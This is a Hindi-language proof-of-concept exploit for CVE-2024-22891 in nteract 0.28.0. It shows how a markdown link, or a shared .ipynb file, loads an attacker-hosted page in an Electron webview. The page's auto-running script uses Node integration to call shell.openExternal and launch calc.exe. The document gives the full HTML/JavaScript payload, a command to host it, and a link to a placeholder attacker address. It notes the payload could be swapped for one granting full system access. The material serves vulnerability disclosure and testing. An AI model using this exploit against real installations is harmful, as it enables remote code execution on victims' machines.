
nteract 0.28.0 ओपन रीडायरेक्ट से RCE एक्सप्लॉइट
CVE-2024-22891 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।
nteract 0.28.0 मार्कडाउन लिंक के माध्यम से इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।
nteract 0.28.0 मार्कडाउन लिंक के माध्यम से इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है (क्योंकि webPreferences में nodeIntegration सत्य है)।
शोषण स्पष्टीकरण
चरण 1) हमलावर openExternal() फ़ंक्शन का उपयोग करके calc.exe लॉन्च करने के लिए स्रोत कोड के लिए सर्वर बनाता है।
<html>
<head>
<title>jruru Link</title>
</head>
<body>
<a id="jruruLink">jruru Link</a>
<script>
// Script function definition
function openExternal() {
try {
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
} catch(e) {
alert('JRURU - External link cannot be opened.');
console.error(e);
}
}
// Automatically execute openExternal function after the page is loaded
document.addEventListener('DOMContentLoaded', function() {
openExternal();
});
</script>
</body>
</html>
नोट: ※ यदि आप इसे जल्दी से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के पीसी पर एक सर्वर बनाएं।
$ python -m http.server 80
चरण 2) पीड़ित के सिस्टम पर nteract एप्लिकेशन निष्पादित करें और एक मार्कडाउन लिंक बनाएं, या उदाहरण कोड के रूप में हमलावर की ipynb फ़ाइल साझा करें। फिर, calc.exe निष्पादित करें।
[Read This] (http://[attcker_adress]/shard_data.html)

फ़ाइल साझाकरण के माध्यम से .ipynb फ़ाइल निष्पादित करते समय सावधान रहें क्योंकि लिंक दिखाई नहीं दे सकता है। यह calc.exe कोई भी स्थानीय या रिमोट दुर्भावनापूर्ण पेलोड हो सकता था जो हमलावर को पीड़ित के सिस्टम तक पूर्ण पहुंच दे सकता था।